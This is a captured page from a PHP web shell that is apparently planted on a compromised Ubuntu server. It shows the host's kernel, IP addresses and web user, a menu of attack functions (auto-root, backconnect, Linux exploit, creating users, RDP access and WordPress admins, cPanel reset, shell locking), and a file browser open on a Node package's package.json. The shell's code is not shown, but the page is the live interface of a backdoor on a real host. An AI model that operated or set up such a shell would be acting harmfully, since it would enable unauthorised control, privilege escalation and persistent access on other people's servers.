Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
http-proxy /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
dr-xr-xr-x
.auto-changelog
113
B
-rw-rw-rw-
.gitattributes
25
B
-rw-rw-rw-
CHANGELOG.md
172.39
KB
-rw-rw-rw-
CODE_OF_CONDUCT.md
3.18
KB
-rw-rw-rw-
LICENSE
1.13
KB
-rw-rw-rw-
README.md
18.95
KB
-rw-rw-rw-
codecov.yml
156
B
-rw-rw-rw-
index.js
375
B
-rw-rw-rw-
package.json
1017
B
-rw-rw-rw-
renovate.json
369
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "http-proxy", "version": "1.18.1", "repository": { "type": "git", "url": "https://github.com/http-party/node-http-proxy.git" }, "description": "HTTP proxying for the masses", "author": "Charlie Robbins <charlie.robbins@gmail.com>", "maintainers": [ "jcrugzz <jcrugzz@gmail.com>" ], "main": "index.js", "dependencies": { "eventemitter3": "^4.0.0", "requires-port": "^1.0.0", "follow-redirects": "^1.0.0" }, "devDependencies": { "async": "^3.0.0", "auto-changelog": "^1.15.0", "concat-stream": "^2.0.0", "expect.js": "~0.3.1", "mocha": "^3.5.3", "nyc": "^14.0.0", "semver": "^5.0.3", "socket.io": "^2.1.0", "socket.io-client": "^2.1.0", "sse": "0.0.8", "ws": "^3.0.0" }, "scripts": { "mocha": "mocha test/*-test.js", "test": "nyc --reporter=text --reporter=lcov npm run mocha", "version": "auto-changelog -p && git add CHANGELOG.md" }, "engines": { "node": ">=8.0.0" }, "license": "MIT" }
Close